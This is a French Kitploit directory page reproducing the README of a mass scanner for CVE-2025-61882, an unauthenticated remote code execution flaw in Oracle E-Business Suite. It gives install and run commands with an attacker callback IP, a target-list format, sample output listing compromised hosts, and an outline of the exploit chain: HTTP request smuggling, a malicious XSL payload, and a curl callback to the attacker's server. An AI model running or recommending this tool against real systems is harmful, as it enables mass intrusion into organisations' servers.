Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-61882 — Scanner multi-threadé pour CVE-2025-61882 dans Oracle E-Business Suite, exploitant le détournement de requêtes HTTP pour parvenir à une exécution de code à distance non authentifiée et valider via la sortie de commande. | Kitploit
Outils/GitHubGitHub/sachinart/cve-2025-61882
ReconnaissanceScanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubsachinart/cve-2025-61882

CVE-2025-61882

Scanner multi-threadé pour CVE-2025-61882 dans Oracle E-Business Suite, exploitant le détournement de requêtes HTTP pour parvenir à une exécution de code à distance non authentifiée et valider via la sortie de commande.

Voir le dépôt
1173il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner RCE pour Oracle E-Business Suite (CVE-2025-61882)

Un scanner de masse rapide et multi-thread pour détecter la CVE-2025-61882 dans les installations Oracle E-Business Suite. Cette vulnérabilité critique permet une exécution de code à distance non authentifiée.

Python Version License CVE

🎯 Fonctionnalités

  • Analyse de masse - Traite des centaines ou des milliers de cibles à partir d'un fichier
  • Multi-thread - Analyse concurrente configurable (par défaut : 20 threads)
  • Détection automatique - Valide l'exécution de code à distance en exécutant la commande id et en analysant la sortie
  • Résultats en temps réel - Les cibles vulnérables sont écrites dans vuln-output.txt immédiatement
  • Ports aléatoires - Utilise des ports aléatoires (2000-9999) pour chaque cible afin d'éviter les conflits
  • Sortie propre - Suivi de progression avec un minimum de bruit

📋 Prérequis

root@kitploit:~
pip install requests

C'est tout. Juste Python 3.7+ et la bibliothèque requests.

🚀 Installation

root@kitploit:~
git clone https://github.com/Sachinart/CVE-2025-61882.git
cd CVE-2025-61882
pip install -r requirements.txt

💻 Utilisation

Analyse de base

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS

Analyse rapide (50 threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS --threads 50

Analyse prudente (10 threads)

root@kitploit:~
python3 cve-2025-61882.py --targets targets.txt --lhost VOTRE_IP_VPS --threads 10

📝 Format du fichier de cibles

Créez un fichier targets.txt avec une URL par ligne :

root@kitploit:~
http://oracle-ebs1.example.com:8000
https://oracle-ebs2.example.com:443
http://192.168.1.100:8001
https://apps.company.com

📊 Exemple de sortie

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║   Scanner RCE pour Oracle E-Business Suite (CVE-2025-61882)  ║
╚═══════════════════════════════════════════════════════════════╝

[*] 1235 cibles chargées depuis le fichier
[*] Exécution avec 20 threads concurrents
[*] Les hôtes vulnérables seront enregistrés dans vuln-output.txt

[*] [1/1235] Vérification de https://target1.com:443 sur le port 7893
[*] [2/1235] Vérification de https://target2.com:443 sur le port 5882

[+] Trouvé ! 129.146.56.43 est vulnérable
[+] Sortie de la commande : uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)

=================================================================
[*] Analyse terminée en 245.67 secondes
[*] 3 cible(s) vulnérable(s) trouvée(s)
[*] Consultez vuln-output.txt pour les résultats complets
=================================================================

[+] Cibles vulnérables trouvées :

    129.146.56.43 → uid=54321(oracle) gid=54321(oinstall)
    192.168.1.50 → uid=1000(applmgr) gid=1000(dba)
    10.0.0.100 → uid=500(oracle) gid=500(oinstall)

📄 Fichier de sortie

Les résultats sont enregistrés dans vuln-output.txt :

root@kitploit:~
# Oracle EBS CVE-2025-61882 - Résultats de l'analyse
# Début : Tue Oct 07 15:30:45 2025
# Total des cibles : 1235
# Scanner par : Chirag Artani

129.146.56.43 | uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall)
192.168.1.50 | uid=1000(applmgr) gid=1000(dba) groups=1000(dba)
10.0.0.100 | uid=500(oracle) gid=500(oinstall) groups=500(oinstall)

🔍 Comment ça fonctionne

  1. Récupération du jeton CSRF - Obtient un jeton CSRF valide depuis la cible
  2. Contrebande de requêtes HTTP - Exploite la vulnérabilité de contrebande pour injecter une charge utile malveillante
  3. Livraison de la charge utile XSL - Sert une feuille de style XSL malveillante qui exécute des commandes
  4. Validation par rappel - La cible exécute la commande id et renvoie la sortie via curl
  5. Correspondance par expression régulière - Valide l'exécution de code à distance réussie en vérifiant le motif uid=...gid=...

⚙️ Configuration

🔒 Divulgation responsable

Cet outil est destiné uniquement aux tests de sécurité autorisés. Toujours :

  • ✅ Obtenir une autorisation écrite avant de tester
  • ✅ Analyser uniquement les systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite
  • ✅ Signaler les découvertes de manière responsable aux organisations concernées
  • ✅ Suivre les pratiques de divulgation coordonnée des vulnérabilités
  • ❌ Ne jamais utiliser sur des systèmes non autorisés

L'accès non autorisé aux systèmes informatiques est illégal.

🐛 Problèmes connus

  • Certaines cibles peuvent expirer en raison du blocage par pare-feu/IDS
  • La détection par rappel nécessite que la cible atteigne votre VPS sur des ports aléatoires
  • Les avertissements de certificat SSL sont supprimés (attendu pour les tests d'intrusion)

🤝 Contribution

Vous avez trouvé un bug ? Vous avez une demande de fonctionnalité ?

  1. Forkez le dépôt
  2. Créez votre branche de fonctionnalité (git checkout -b feature/amazing-feature)
  3. Commitez vos modifications (git commit -m 'Add some feature')
  4. Poussez vers la branche (git push origin feature/amazing-feature)
  5. Ouvrez une demande de tirage (Pull Request)

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

⚠️ Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par cet outil. Utilisez-le à vos propres risques.

📚 Références

  • Détails de la CVE-2025-61882
  • Mise à jour critique de correctifs Oracle

👨‍💻 Développé par Chirag Artani

Site web • Twitter • LinkedIn

Fait avec ❤️ pour la communauté infosec

Télécharger l’outil
ArgumentRequisDéfautDescription
--targetsOui-Chemin vers le fichier contenant les URL cibles
--lhostOui-Votre adresse IP VPS/attaquant
--threadsNon20Nombre de threads concurrents